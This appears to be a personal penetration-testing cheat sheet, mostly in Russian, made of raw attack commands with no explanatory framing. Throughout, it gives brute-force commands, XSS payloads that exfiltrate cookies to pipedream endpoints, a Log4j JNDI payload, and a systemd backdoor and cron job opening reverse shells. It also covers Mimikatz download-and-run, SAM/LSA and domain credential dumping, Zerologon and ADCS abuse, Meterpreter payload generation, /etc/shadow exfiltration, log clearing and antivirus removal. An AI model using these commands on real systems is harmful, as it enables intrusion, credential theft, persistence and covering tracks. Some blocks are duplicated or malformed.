https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/tree/main?tab=readme-ov-file
https://github.com/ayoubfathi/leaky-paths/blob/992f8e38efc3edbd2b6d634600c59524b2605356/leaky-paths.txt#L296
echo ‘PubkeyAcceptedAlgorithms +ssh-rsa’ >> /etc/ssh/sshd_config
hydra -V -f -t 4 -l root -P pass.txt ssh://<victim_ip>
patator ssh_login host=<victim_ip> user=john password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
nmap -p22 --script=ssh-brute --script-args userdb=users.txt,passdb=pass.txt 172.16.60.1
du -sh /home
Подсчет значений в таблице
=СЧЁТЕСЛИ($A$2:$A$100;A2)
#!/usr/bin/env bash
cert="$1"
#echo "cert: $cert"
echo "Extract .crt and .key files from .pfx file"
openssl pkcs12 -in $cert -nocerts -out $cert.key
echo "Extract the certificate"
openssl pkcs12 -in $cert -clcerts -nokeys -out $cert.crt
echo "Decrypt the private key"
openssl rsa -in $cert.key -out $cert.key
chmod +r $cert*
nmap -Pn -vv -F -T4 --min-rate 50000 --min-hostgroup 100 -iL targets.txt
nmap -Pn -n -sT -p 88,135,137,389,445,1433,3389 -sV -sC --open -iL list-of-machines.txt
- Применение эксплойтов к известным уязвимостям (https://github.com/SecWiki/windows-kernel-exploits?tab=readme-ov-file)
- Применение атак методом перебора
- Перехват трафика и атаки MiTM (https://github.com/frostbits-security/MITM-cheatsheet?tab=readme-ov-file#sslstrip-sslstrip-hsts)
- Поиск неправильной конфигурации (Redis, Сетевые шары, веб-порталы)
findstr /s /p /i /n /m "password" *.xml *.ini *.txt *.config
doskey m=minikube $*
doskey k=kubectl $*
minikube ssh
k get nodes
k cluster-info
k get pods
k get pods --namespace=kube-system
k get pods -o wide
k get namespaces
k get svc
k get deployment
k run nginx --image=nginx:latest
k delete pods nginx
k describe pod nginx
k create deployment nginx-deployment --image=nginx
Методология OWASP
- сбор информации (Краулинг) nmap, dnscan, google, whatweb, burp spider
- тестирование конфигурации (dirbuster, http method, )
- тестирование механизмов идентификации (burp+secList)
- тестирование механизмов аутентификации (Recovery)
- тестирование механизмов авторизации (DirTraversal, Id Inc, FileBrute)
- тестирование механизмов управления сессиями (Cookie, CSRF)
- тестирование валидации входных данных (XSS, SQLi, XML, LDAP, XPATH, HTTP-Splitting)
- тестирование обработки ошибок (ERROR handle)
- тестирование на предмет некриптостойкого шифрования (SSL/TLS)
- тестирование бизнес-логики приложения (Валидация данных, бизнес-логики, загрузка данных)
- тестирование механизмов безопасности клиентской части(XSS,JavaScript-инъекции, Clickjacking, WebSockets;)
Межсайтовый скриптинг:
"><img src=# onerror="alert(xss)">
"><script>alert(1)</script>
<img src=x onerror=alert(1)/>
<svg onload=alert('XSS')>
1"--><svg/onload=';alert(0);'>
"><img src=x onerror=fetch('https://ADDR.x.pipedream.net/?'+document.cookie) />
"><script>
fetch('https://https://eo4xbi0886zyrkf.m.pipedream.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>\
callback https://requestbin.com
Набор данных для фаззинга:
https://github.com/Bo0oM/fuzz.txt
https://github.com/danielmiessler/SecLists
Sql injection
- Stacked queries — инъекция SQL-запросов, позволяющая злоумышленнику выполнить несколько запросов за один раз.
- Union-based — инъекция, использующая оператор UNION для объединения результатов двух запросов, что позволяет злоумышленнику извлекать данные из других таблиц.
- Error-based — инъекция, основанная на ошибке, которая может возникнуть при выполнении запроса, что позволяет злоумышленнику получать информацию об уязвимости.
- Boolean blind — инъекция, при которой злоумышленник использует булевы выражения для проверки наличия или отсутствия определенных данных в базе данных.
- Time-based — инъекция, которая использует задержку выполнения запроса для получения информации о базе данных.
- Out of band — инъекция, которая не взаимодействует с сайтом напрямую, а использует другой канал для передачи данных, например, отправку электронной почты или HTTP-запросов.
sqlmap -r target1 --dbms=mssql --all --hex --tamper=space2comment,between,charencode --level=5 --risk=3
Basic брут
hydra -L tomcat_user.txt -P tomcat_pass.txt -f alic.trust.localhost -s 7012 http-get /manager/html
Брут битрксового хеша
hashcat -a 0 -m 20 pass.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt
Заблокировать вредоносные агенты
if ($http_user_agent ~* (^curl|wallarm|bot|scan|monotor|xyz|package|python|w3af.sourceforge.net|dirbuster|nikto|wpscan|SF|sqlmap|fimap|nessus|whatweb|Openvas|jbrofuzz|libwhisker|webshag|acunetix|nmap|wikto|bsqlbf|havij|appscan|wpscan|ApacheBench|w3af|Arachni|XSpider|Hydra|Evas$))
{return 418;}
Рекурсивный поиск директорий
for domain in $(cat domains.txt); do dirb https://$domain ~/Pentest/SecLists-master/Discovery/Web-Content/b00m_fuzz.txt | grep '+' >> log.txt; done
ffuf -u https://oq.localhost/FUZZ -w fuzz.txt -fc 301,403
Поиск данных
amass enum -v -src -ip -d gov.kz
https://crt.sh/
https://dnsdumpster.com/
https://apps.db.ripe.net/db-web-ui/fulltextsearch
https://spark-interfax.ru/
https://builtwith.com/website-lists/Bitrix
https://bgp.he.net/
Проверить пароль для сертификата
openssl rsa -noout -in суке.pem -passin 'pass:**********' 2>/dev/null && echo 'Valid' || echo 'Not Valid'
Log4j
GET /?x=${jndi:${lower:l}${lower:d}a${lower:p}://${:-116}.${hostname}.<collaborator_url>/a} HTTP/1.1
Host: 195.235.1.1
Connection: close
Закрепление
systemd (создать файл в /lib/systemd/system/backdoor.service и Запустить его командами: sudo systemctl enable backdoor.service && sudo systemctl start backdoor.service)
[Unit]
Description=Backdoor
After=network.target ssh.service
[Service]
Type=simple
PIDFile=/var/run/backdoor.pid
ExecStart=sh -i >& /dev/tcp/192.168.0.177/9001 0>&1"
Restart=always
RestartSec=10
[Install]
WantedBy=multi-user.target
Поиск данных в .git
git log -p | findstr /i /c:"password" /c:"token" /c:"secret" /c:"пароль" /c:"basic-auth" /c:"DB_PASS" > password.txt
git log -p | Select-String _PASSWORD,_TOKEN,PSW=,Authorization > password.txt
Select-String -Path .\passwords.txt -Pattern "_PASSWORD ="
Проверить SQLI sleep
curl -o /dev/null -s -w 'Total: %{time_total}s\n' https://test.localhost/index.php?kato=276600000
curl -o /dev/null -s -w 'Total: %{time_total}s\n' https://test.localhost/index.php?kato=271000000%20AND%20%28SELECT%203735%20FROM%20%28SELECT%28SLEEP%285%29%29%29cCNC%29
Проблема установки пакетов pip в корпоративной среде, варианты решения:
- export HTTPS_PROXY=https://172.16.70.1:8888/ && export HTTP_PROXY=http://172.16.70.1:8888/ или set HTTPS_PROXY=https://172.16.70.1:8888/ && set HTTP_PROXY=http://172.16.70.1:8888/
- pip3 install GitPython --proxy="https://172.16.70.1:8888" --global http.sslVerify false --trusted-host 172.16.70.1 --trusted-host pypi.org --trusted-host files.pythonhosted.org --trusted-host 172.16.70.1
- pip install --index-url https://user:pass@nexus.company.local/repository/Python-group/simple GitPython
Поиск хоста без антивируса
wmic /Node:"host1" /USER:"domain\user" /namespace:\\root\SecurityCenter2 path AntiVirusProduct get * /value | findstr /V /B /C:displayName || echo No Antivirus installed
WMIC /Node:"host1","host2" /USER:"domain\user" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /value
wmic /Node:@C:\tmp\targets.txt /USER:"domain\user" /namespace:\\root\SecurityCenter2 path AntiVirusProduct get * /value
Проверка сертификата
openssl s_client -showcerts -connect ast.example.com:443
Linux
- https://gtfobins.github.io/ (sudo -l)
- find /home/ -perm 4000 (suid-бит)
- cat ~/.bash_history
- cat /etc/crontab
- pwnkit -- https://github.com/PwnFunction/CVE-2021-4034
- https://github.com/rebootuser/LinEnum
- https://github.com/luke-goddard/enumy
- https://github.com/mostaphabahadou/postenum
- https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation
adduser user
usermod -aG sudo user
mkdir /home/user/.ssh
echo 'ssh-rsa AAAAB3N.....lbigkey root@myserver.local' >> /home/user/.ssh/id_rsa.pub
chmod -R 600 /home/user/.ssh
chown -R user:user /home/user/.ssh
echo 'user ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
echo 'Match User user' >> /etc/ssh/sshd_config
echo ' PasswordAuthentication no' >> /etc/ssh/sshd_config
echo 'PubkeyAcceptedAlgorithms +ssh-rsa' >> /etc/ssh/sshd_config
sudo systemctl restart sshd
Найти всех sudoers
SUID: find / -perm -u=s -type f 2>/dev/null
Windows
- Повышение привилегий через права на создание резервных копий (SeBackupPrivilege)
- Повышение привилегий через перехват сервиса (Weak Services Permission)
- Повышение привилегий через имперсонификацию SeImpersonatePrivilege (JyicyPotato)
- Повышение привилегий через права на установку ПО (AlwaysInstallElevated)
- Повышение привилегий через изменение пути бинарного файла сервиса (Service Binary Path)
- Повышение привилегий через подмену DLL библиотек (DLL Hijacking)
- Повышение привилегий через неэкранированные пути сервисов (Unquoted Service Paths)
- mimipenguin https://github.com/huntergregal/mimipenguin.git
- gimmecredz https://github.com/0xmitsurugi/gimmecredz
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
powershell -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
LinPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
WinPEAS https://github.com/carlospolop/PEASS-ng/ https://github.com/carlospolop/PEASS-ng/releases/download/20230413-7f846812/winPEASx64.exe
Найти не экранированные сервисы (подробнее: https://juggernaut-sec.com/unquoted-service-paths/):
Сбор сведений о RPC (print system)
rpcdump.py @10.10.10.175 | egrep 'MS-RPRN|MS-PAR'
ONLY: MSRPC (SMB), DCERPC (WMI), WINRM, MS SQL,RDP (только Windows 2012 R2 и Windows 8.1), LDAP, IMAP, HTTP
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:cdf51b162460b7d5bc898f493751a0cc example.local/Administrator@<target_ip> whoami
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName
Поиск учетных записей в реестре
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
LSA Dump
reg save HKLM\SYSTEM system.save
reg save HKLM\security security.save
reg save hklm\sam sam.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
certutil -urlcache -split -f http://10.10.14.16/mimikatz.exe C:\Windows\System32\spool\drivers\color\m.exe
Как получить учётную запись в AD:
- Прослушивание траффика
- Password spray
- LLNR, WPAD, spoof responder
- Ipv6 attack mitm6
- Mitm + DNS fake+ Portal fake = intercepter-ng
- Поиск общедоступных шар crakmapexec, WinGrep
- Поиск серверов с уязвимостью
- Поиск секретов Wiki, confluence, jira
- Petitpotam
- Zerologon (Приводит к установке пустого пароля машинного аккаунта контроллера домена, что может повлечь нарушение работы домена в целом. https://github.com/VoidSec/CVE-2020-1472)
- DCSync (python3 secretsdump.py test.local/john:password123@10.10.10.1)
- SamAccountNameSpoofing
- PrinterNightmare
- Password Spraying
- Поиск пароля в описании пользователей
Энумерация сессий Инструменты: PowerView, RSAT, ADExplorer, LdapAdmin, DExplorer, Bloodhound, ADRecon
netview.py -target <victim_ip> username
netview.py domain.local/username (получить все)
Get-NetLoggedon -ComputerName <servername>
Get-NetSession -ComputerName <servername>
Get-LoggedOnLocal -ComputerName <servername>
Get-LastLoggedon -ComputerName <servername>
Get-NetRDPSession -ComputerName <servername>
Сбор информации
dig -t SRV _gc._tcp.domain.local
dig -t SRV _ldap._tcp.domain.local
dig -t SRV _kerberos._tcp.domain.local
dig -t SRV _kpasswd._tcp.domain.local
dig -t wpad.domain.local
Поиск учетных записей в Linux для Windows
*.ccache может лежать в папке /tmp/ или файл *.keytab в папке /etc
export KRB5CCNAME=/etc/john.ccache; python3 psexec.py test.local/john@<victim_ip> -k -no-pass
Поиск Gpp
findstr /S /I cpassword \\domain.trust.localhost\sysvol\vestik\policies\*.xml
SPN учетки
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 172.16.1.1 trust.localhost/ptuser -request
[W] Get-NetUser -SPN -Server srv1.trust.localhost -Credential $cred | select serviceprincipalname
[L] ldapsearch -LLL -x -H ldap://172.16.1.1 -D "capitan@trust.localhost" -W -b "dc=trust,dc=localhost" "servicePrincipalName=*" sAMAccountName servicePrincipalName
hashcat -m 13100 --force <TGSs_file> <passwords_file>
for i in $(find -name '*.txt'); do hashcat -m 13100 --force tgt_ticket.txt "$i"; done >> /tmp/brute_tgt.log
Petitpotam
- Certipy find –u user@trust.localhost -p 'pass' –bloodhound –dc-ip 172.16.126.128
- impacket-ntlmrelayx -smb2support -t https://CA-01/certsrv/certfnsh.asp --adcs --template DomainController* (результат Certipy && в отдельном окне)
- python3 petitpotam.py –u user@trust.localhost –p 'pass' –d 'trust.localhost' ntlmrelay_ip* dc_ip*
- сat base64_cert.txt | base64 -d > host_cert.pfx (полученый билет из ntlmrelayx)
- python3 gettgtpkinit trust.localhost/dc$ -cert-pfx path-to-cert* host.ccache
- export KRB5CCNAME=host.ccache
- python3 getnthash.py domain.local/dc$ -key as-rep-key*
- python3 secretsdump.py –hashes ':nt-hash' 'trust.localhost/dc:$@dc-ip' –just-dc-user user*
https://github.com/ly4k/Certipy
https://github.com/topotam/PetitPotam
https://github.com/dirkjanm/PKINITtools/tree/master
https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py
https://habr.com/ru/companies/deiteriylab/articles/581758/
LLMNR
- sudo responder -I eth0
- hashcat -a 0 -w 4 -m 5600 tickets.txt /usr/share/wordlists/rockyou.txt
- evil-winrm -i [ip] -u [username] -p [password]
FTP
ftp anonymous@hostname (anonymous)
ls|prompt no|mget * .|
wget -m ftp://anonymous:anonymous@hostname
Password Spraying
crackmapexec <Service> <IP> -u <UserList> -p <PasswordList>
hydra -L <userList> -P <PasswordList> <Service>://<IP> -v -I
Zerologon
msf6> use auxiliary/admin/dcerpc/cve_2020_1472_zerologon (set ACTION RESTORE -> set PASSWORD <$MACHINE.ACC hex password>)
msf6> set RHOSTS <victim_ip>
msf6> set NBNAME <victim_name>
Или
python3 cve-2020-1472-exploit.py -n 'DC01$' -t <victim_ip>
impacket-secretsdump -no-pass -just-dc-user administrator 'sandox.local/<victim_name>$@<victim_ip>'
impacket-wmiexec -hashes <hash> 'sandbox.local/administrator@192.168.0.117'
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
(impacket-wmiexec) lget system.save
del /f system.save security.save sam.save
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
Certify
Запрос сертификата по шаблону создания сертификата для другого пользователя:
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC1-Test -upn administrator@corp.local -dns dc.corp.local
Запрос TGT и получение NT хеша с использованием полученного ранее сертификата:
certipy auth -pfx administrator_dc.pfx -dc-ip 172.16.126.128
evil-winrm -i <IP> -u <User> -H <NThash> || crackmapexec smb <IP> -u <User> -H <NTLM>
Поиск пароля в описании пользователей
enum4linux -u <victim_user> -p <victim_pass> -U <victim_ip>
ldapdomaindump -u .\\<victim_user> -p <victim_pass> <victim_ip> -o result
bloodhound (neo4j): MATCH (u:User) WHERE not u.description CONTAINS "Built-in" return u.name, u.displayname, u.description, u.group
SMB Шары
smbmap -u shut -p nik123 -H alloc.trust.localhost -d trust.localhost (-q -R --depth 5 -A 'passw' --exclude ADMIN$ IPC$ C$ --host-file hosts.txt)
crackmapexec smb inv1.trust.localhost -u shut -p nik123 -d trust.localhost --put-file k1.exe \\k1.exe
wmic /node:alloc.trust.localhost /user:'trust.localhost\shut' /password:nik123 share list \\172.16.1.1
enum4linux -a -u shut -p nik123 -w trust.localhost alloc.trust.localhost
Подбор пароля
hydra -L ~/wordlists/user.txt -P ~/wordlists/pass.txt <victim_ip> smb -V
Монтирование шары
sudo apt install cifs-utils && sudo mkdir /mnt/win_share && sudo mount -t cifs -o username=shut //nas.trust.localhost/WORK/logs /mnt/win_share
Скачать файл
certutil -urlcache -f -split https://live.sysinternals.com/PsExec64.exe
или
certutil -VerifyCTL -f -split https://live.sysinternals.com/PsExec64.exe
Получить хеш файла Windows
Echo 'Certutil -hashfile %1 MD5' >>C:\md5.bat
Linux
md5sum ex.xml
Генерируем статические ключи
openvpn --genkey secret static.key
Конфигурация сервера
dev tun
ifconfig 172.27.0.1 172.27.0.2 #Сервер клиент
secret static.key
proto tcp-server
port 443
Конфигурация клиента
dev tun
remote 192.168.1.110
port 443
proto tcp-client
ifconfig 172.27.0.2 172.27.0.1 #клиент Сервер
route 172.27.1.0 255.255.255.0 172.27.0.1
route 10.1.1.0 255.255.255.0 172.27.0.1
cipher AES-256-CBC
secret D:\\vlab\\static.key
script-security 2
dhcp-option DNS 172.16.1.1
dhcp-option DOMAIN trust.localhost
Скачать
powershell "IEX(New-Object Net.WebClient).downloadString('http://nur1.files.kz/robots.txt')"
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://nur1.files.kz/robots.txt')|iex"
smbmap -u vboxuser -p Qwerty123 -H 172.16.1.1 -x 'certutil.exe -urlcache -f http://172.16.1.3:8888/Rubeus.exe Rubeus.exe'
bitsadmin /transfer myDownloadJob /download /priority normal http://172.16.1.3:8888/Rubeus.exe c:\Rubeus.exe
Windows
schtasks /create /tn Update /tr "file" /sc onlogon /ru System #minite
linux
(crontab -l;printf "*/1 * * * * nc ip_server_to_connect 3000 -e /bin/bash\n")|crontab -
nc -vlkp 3000 2>/dev/null
ssl_config:
[req]
default_bits = 4096
prompt = no
default_md = sha256
x509_extensions = v3_req
distinguished_name = dn
[dn]
C = IN
ST = Tashkent
L = Uz
O = J
emailAddress = no@domain
CN = ns1.domain
[v3_req]
basicConstraints = critical,CA:TRUE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
[alt_names]
email = noreplay@domain
openssl req -new -x509 -newkey rsa:4096 -sha256 -nodes -keyout "server.key" -days 356 -out "cert.crt" -config ssl_config
cat server.key cert.crt > cert.pem
msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.65.135 lport=443 -f exe HandlerSSLCert=./cert.pem StagerVerifySSLCert=true -o idm.exe
email = noreplay@domain
openssl req -new -x509 -newkey rsa:4096 -sha256 -nodes -keyout "server.key" -days 356 -out "cert.crt" -config ssl_config
cat server.key cert.crt > cert.pem
msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.65.135 lport=443 -f exe HandlerSSLCert=./cert.pem StagerVerifySSLCert=true -o idm.exe
msf exploit(multi/handler) > set HandlerSSLCert /home/user/cert.pem
msf exploit(multi/handler) > set StagerVerifySSLCert true
msfvenom -p windows/meterpreter/reverse_winhttps lhost=172.16.7.2 lport=443 -e x86/xor_dynamic -f exe > idm4.exe
// sudo msfconsole -qr auto.rc
https://ppn.snovvcrash.rocks/pentest/c2/meterpreter
rdp_check <domain>/<name>:<password>@<IP>
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.186.81 /u:'Administrator' /p:'Password321'
xfreerdp /u:john /p:loveme1 /w:768 /v:<victim_ip>
Linux
sudo grep '\$' /etc/shadow | base64 | tr -d '\n' |xargs -I @ curl http://172.16.72.1/hash/@
curl -F file=@/tmp/<redacted>.zip hxxps://store1[.]gofile[.]io/uploadFile
from distutils.log import debug
from fileinput import filename
from flask import *
app = Flask(__name__)
#@app.route('/')
#def main():
# return render_template("index.html")
@app.route('/upload', methods = ['POST'])
def success():
if request.method == 'POST':
f = request.files['file']
f.save(f.filename)
return "File uploaded {}".format(f.filename)
if __name__ == '__main__':
app.run(debug=True, port='8080', host='0.0.0.0')
$wc = New-Object System.Net.WebClient
$resp = $wc.UploadFile(‘http://server/upload’,’ C:\Users\user\AppData\1.zip’)
apt-get update && apt-get upgrade -y
apt-get install terminator -y
apt install docker.io -y
docker ps
docker images (-q -a)
docker exec -it <container_id> netstat -tulpn
docker logs <service_name>
docker inspect <service_name>
docker-compose ps (--services)
docker-compose logs (--tail 1000) <service_name>
dockerd (error logs)
docker system df
docker volume ls
docker rm -v $(docker ps --filter status=exited -q)
docker image ls -q | xargs -I {} sudo docker image rm -f {}
docker inspect <imageid> | jq ".[0].State.Pid" | xargs lsns -p
Windows
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Clear-Eventlog -LogName Application,Security,System
wevtutil cl security && wevtutil cl application && wevtutil cl system
Linux
echo "" /var/log/auth.log
echo "" ~/.bash_history
history -c
export HISTFILESIZE=0 && export HISTSIZE=0 || unset HISTFILE (logout)
Удаление антивируса
wmic product get name /value
wmic product where name="AVP" call uninstall /nointeractive
- ARP spoofing (bettercap -T 10.10.10.10 -X)
- STP (RSTP, PVSTP, MSTP) spoofing
- NDP spoofing
- VLAN hopping
- SLAAC Attack
- Hijacking HSRP (VRRP, CARP)
- Dynamic routing protocol spoofing (BGP)
- RIPv2 Routing Table Poisoning
- OSPF Routing Table Poisoning
- EIGRP Routing Table Poisoning
- ICMP Redirect
- NetBIOS (LLMNR) spoofing
- DHCP spoofing
ettercap, bettercap, mitm6, yersinia,scapy, evilFoca
Windows
netsh interface portproxy add v4tov4 listenport=8001 listenaddress=192.168.0.10 connectport=80 connectaddress=192.168.0.10
netsh interface portproxy add v4tov4 listenport=8001 connectport=80 connectaddress=127.0.0.1
netsh interface portproxy show all
Linux
nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
ssh -L 3336:db001.host:3306 user@pub001.host (при подключении к SSH на узле 10.0.1.3 откроется публичный порт 10080)
ssh -R 0.0.0.0:10080:127.0.0.1:80 user@10.0.1.3
ssh -f -N -D 4444 user@<attacker_ip> (Опция -D в утилите SSH используется для создания динамического SOCKS-прокси на локальной машине. Когда вы используете опцию -D с SSH, SSH клиент подключается к удаленному хосту и на локальной машине открывается локальный SOCKS-прокси-сервер, который может быть использован для перенаправления трафика через зашифрованный туннель SSH на удаленном хосте.)
socat TCP4-LISTEN:<lport>,fork TCP4:<target_ip>:<rport> &
gost -L=:8080 || gost -L=socks://:1080
Прочитать информацию об сертификате
openssl x509 -in cert.pem -noout -issuer -subject -dates -nameopt sep_multiline
журналы MySQL
grep "A temporary password" /var/log/mysql.log | tail -1
mimikatz
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
Выгрузить все данные из БД
mysqldump -u root -p --no-create-db --lock-tables=false --skip-add-locks --single-transaction –quick --skip-triggers <redacted> | gzip <redacted>.sql.gz
Команда для переноса трафика из tcpdump с удаленного узла, в интерфейс wireshark на локальном узле:
ssh root@10.0.5.11 tcpdump -i any -s0 -nn -w - | wireshark -k -i -
- Взаимность (Reciprocity)
- Обязательность и последовательность (Commitment and consistency)
- Социальное доказательство (Social proof)
- Власть и авторитет (Authority): "Доверьтесь знающему человеку"
- Сходство и симпатия (Liking)
- Дефицит (Scarcity)
- Infoga - https://github.com/m4ll0k/Infoga
- FocaPro - https://github.com/ElevenPaths/FOCA
- TheHarvester - https://github.com/laramies/theHarvester
- hydra -L userlist.txt -s 465 smtp.gmail.com smtp
- swaks --to mike@sandbox.local --from admin@sandbox.local --server 192.168.13.37 --attach @upd.exe
hunter.io snov.io intelx.io
https://github.com/elceef/dnstwist https://github.com/kgretzky/evilginx2 https://getgophish.com/
- SMTP User Enumeration (RCPT TO, MAIL FROM, VRFY) - энумерация (перебор) пользователей почтового сервера через протокол SMTP
- OWA (Outlook Web Access) Enumeration - энумерация (перебор) пользователей почтового сервера через веб-страницу Outlook Web Access.
- Фишинг (Phishing)
- Vishing (голосовой фишинг)
- Baiting
- poste.io
- mailgun.com, Amazon Simple Email Service (Amazon SES), SendPuls
- mail.ru, gmail.com, yandex.ru
- https://github.com/giuliacassara/awesome-social-engineering
- https://www.verifyemailaddress.org/